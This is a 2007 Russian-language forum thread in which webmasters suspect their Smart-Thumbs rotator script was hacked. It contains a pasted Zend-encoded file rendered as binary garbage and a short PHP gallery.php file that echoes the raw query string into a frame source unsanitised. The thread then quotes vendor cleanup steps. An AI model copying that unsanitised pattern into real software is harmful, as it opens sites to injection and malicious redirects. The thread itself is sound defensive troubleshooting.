Хакнули Smart-Thumbs ?

Тема: Хакнули Smart-Thumbs ?

цитата
26/09/07 в 17:42

X-dream


Нашел такую строку во всех темплетах и фаил db_structure.php 15 августа появился везде.

Че за нах? )

Последний раз редактировалось: X-dream (01/10/07 в 20:55), всего редактировалось 3 раз(а)

цитата
26/09/07 в 17:44

usanatol
че в файле то окажи

цитата
26/09/07 в 17:47

X-dream
Цитата:

Zend 2003120701 1 2326 8227 xщ
џ2µZЛЏЫЖз:x»Ы лS/=(F6’ЇДб9¤m9Шмjј+GЦ¦NT %JK["eЉ›}ДнЅ·\Њж’cs-ђ^zКяђC‘ЈЪўИ)‚Ъѕt†Џбђвлв…aQњЯМчщћ#кь?5¬QҐmС@гTј?_4¦“uMЦ *©„1/
ќОf
}4rи‘§g8Ћнcn;®iM~Ѕ
T¤ЄЄ(ЄИ›1wЊЙ`¦»Г“
Кђк“Иlo„LњкCcc)@STYт}ШШњгЬ\ё‹
iHEІўI4‡Ў#3Чњ’€†ў¬b*}µT(AUA^ѕ}bиD¬uA`EуЮќZSУzL1б!Uў…ќ='z0тZU MUиk‡,аїV$ Њe‰&щc
Я PF@C@БtЭсpj/Њ
Qj2TdПћR:jШяЏ°x±жЫuш±e]…к–„GБЛЅЧьН .ѓј9€yЊнУЇxиЯ2rЂ‘“јІGб‡µ+qґuxїУЮв‰"б/I·HЬOпгv/¤%QРЇТЅўм{Еc2c°sР>кыиy0—ПЅпcЖ?B1љЧЦВєВ_…Ё™“нuЫиEY¶=фЧ№*CрЫT‚$©хомо¶пхwwЋЋ ]
КҐъQЄЇs©>мw{їЯйнµчи“?еЛ\Є«eЁю”®\e‰Єя.—вЛ2{йUџbЉ”щGhїНХtљ(AіМ zQ†ЮЛФ€шqg§МЎщ¶Ўэ\e> ©Оaзи`°ЯлъћЅ1{TВд*AсХ›2Иpыvпv€х:ч|рЖ›2ЕРгЬлu|вщќ7l…$'жоvЏЋЪ»эNч€™ўMцW$W D(D(L©9Њ)Мєо
{ЭЭгCЄц^·Ыч±яЌ•4PэЎЦш]ќл©(B…хxЁ,ФљФ·|ИЏ!\>Д%ЃРдг’"ь'6N·LѓэОЭц`°и;ґЬ…ьjB®xѕ2)фYђPnЖrxџе‹4e…еЩiЋІ1;* ¦H±еaG;‡m©Єя.R5fЪJQ5ѕЙU5fщБf8rѓЯ—U,ѕКT,fЛЉЕ
wЉUvZў
чUAKbOR^(µаьЁLиЎФт§EН9-jЪiБ
™PZ”a„0jdKbiВХ\±4&vЉXљ°RV,M°2ЕТТ<IиЩ^Сс №P ЧЩЩYR(
_Й“Љ®fЉEGJКE±ПЊю5E24‰IRьЋ/YЪ~Qь7щўЃлўЈeН‹bїК
p"С 'Lъ lmrKА?…w·М ‘нfииџKЉъ9=$ЎЧюиё}ї?8оuиЈМВ…Ћ>/U№Pдіµ·0ЊGX8ЕDҐЊt‡ЎВA^є}Љz™еч{нГnї=ШЩЫлРO’ЮјйОжНИп{f8юЖ%Б•Ь-yѕД WкGе«Ї¤dУQqцCm%Ј ЪuЅц~»ЧоШWko© Љpk-Ч ~»/N1µ!ыxщд<@\+ уЫ}Дv_"в ЇKмѕМ
ЉВЭ—…оѕ,<,Ь}™yџґЭ—…гlsЭ~лeЎН.НD®«'‡Њ\°«™л§ѓ0Ю™зЪцdрЛ{ НGоX‰4ХHуKi ,
»ърДШЮµ-Ч±§7+–ЅЅpmЗёAџ†tмFevєp·Г»_С]#¦•0UдЪ0~зЉW‰"ь-Ќ5™%‚4’Ї$"…"ЬsфЙLЏxЉЖЃ1жЖВнШЄ«
q\$фњОЛmњ9¦kФ®‡·WХЧќЯl6'ъtєнШ§®б4љ—MУjМOжиг±9jќШУ‹‡єSђзк“3ЪЏ«V\Э™.эngХКВЅкИ\ђЁsqУІ-Јz§A/Е®ЧoЅЅОиЫЦМ>]#ыМjЌOЎkЪVюЕЫлжёRcЁЎm?6Ќ†iЌЊуоёV%–ШХz«µ
(Ц~шЁ%ЮтзџУ gШ&з’>єъдHџVu§ZЇPhBfУ…QIќ>ЧтqdЏЊ+qиЂ‚Єјч7Ё‚Cw†'µжВҐ
}J4ЬNМ§Гsц•~NlпcиЌ№3Ш4лwZb j#®jBиsЭ©зsУ1-тЄІGNhЌЄ9xIЁє}bўµры$ш^џ¶Zй_lS|u·|5ЯЄМuч¤ХјЕHTЯ®}pШїп:¦5с„€µлl9B-РП‡ќQ-<2хЖpjЧкЧoTдЂ…?†я8Џ M13
IМЄ!.M Єl4%РВhJ0…Свјh
SШпosщJGЌДЗQц“ҐNИmЊљHжЈ¶9OMетшШе©O'Jдµ€іњj\v
–ЦЩiФЈзyР‚јT$kHI4б‹шќ±,мпЬЅПЗp‚щ03†ђБЇ—b€ЖП}јЯL\M7WьkЪпИЗW@LрЇФЂ.`-рЛrкЌd ($QЦiВЦgЮ±{7VN`TЯIЙ”—Њ®$тЄЊ”— _1¦Гаќ`ъќе¬Й€ЭЋPИџв?“Ћйfґ;HдfйьђСзс¬,=Ў~ҐґњaђБІм.e'dшiжбсФђ<<JА‘Y‰+A,Ї1] ^ѓЂ®…њ„т: $‘ZдЛHЮPZ3{)YFYЭl–,#Ї“ќХ‹¤Г,-
~ еkL“ўc#УЖl‘sG2kP9wн9w‚‘Љњ;БьђіMr"У$g1г“MЈрf’7;™лБ„+$ѓ‘тBGЎ`QЉ"#RёF\вQIЬHІ‹Pю()‰2џ_·CЗњ»’ыґё’eґйЮЮ№Эф'Э ђП’К‹6'K5$Ъ}"ГЊ:
—гуE ±–ПћВ°_LdµИo’?'ђёщ‰бъї,Ј?@ґчwщДЧП1M•Ѓ$z}иЭMЌu¬"IВXЦ(љ:ЅuRMKP’‰ІИТгіu AЂ¤"ЃmИяз>Њх

цитата
26/09/07 в 17:56

usanatol
а ты уверен что это не ихнее у них там случайно автообнавления нету ???
потому как еб... в зенд запихивать что-то на хак не похоже

цитата
26/09/07 в 18:03

X-dream

сеичас делаю апдеит на новую версию 5.68 и тот фаил исчезает.

цитата
26/09/07 в 18:07

shamit
у меня такого нету ..посмотрел

цитата
26/09/07 в 18:44

Diablo
st/admin/rotator.php?action=tools&action_submenu=filecheck&domain_id=1

чек зыс аут =)

цитата
26/09/07 в 18:48

Diablo
блин ,
зашёл щас проверил у себя .
у меня gallery.php какой-то =\ 15 августа - дата появления.

gallery.php - unknown file

Код:

<?
$g = getenv ("QUERY_STRING");
?>
<html>
<head>
<title></title>

<frameset rows="100,*">
<frame name="" src="top.html" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
<frame name="" src="<?php echo $g; ?>" marginwidth="10" marginheight="10" scrolling="auto" frameborder="0">
</frameset>

</head>
</body>
</html>

содержимое

цитата
26/09/07 в 18:52

Diablo
а %)

if you do not use "st/gallery.php" file to open galleries in frame, delete this file (we removed it from ST because of frequently abuse of this file as place for malicious code - "tools>filecheck" can't check content of this file)

отмена тревоги тогда =)

цитата
26/09/07 в 19:40

Danilax
gallery.php это нормально удали его, я из корня папки ст удалял

"# if you do not use "st/admin/galery.php" file to open galleries in frame, delete this file (we removed it from ST because of frequently abuse of this file as place for malicious code - "tools>filecheck" can't check content of this file)"

X-dream

вот это сдела у себя?

2. Check admin login/pass under settings>users and remove unknown admin users. If you have access over phpmyadmin, you can display all users from database by running "SELECT * FROM st_users;" query and delete unknown entries from there (because some entries may not be visible from st admin)
3. Check st/admin/.htpasswd file for logins which are unknown for you
4. Check for suspicious files over tools>file check and remove them.
5. Change FTP/SSH and MYSQL logins for all databases on attacked server
6. Enhance your security by following these instructions these instructions
http://www.thumbsrotator.com/help/manual.php?action=help&cmd=help_list&value[pid]=149

цитата
01/10/07 в 20:56

X-dream


Вобщем убрал везде этот инклюд и трафф пошел вверх...

... на всех сайтах... хз... совпадение может.

Новая тема Ответить

Эта страница в полной версии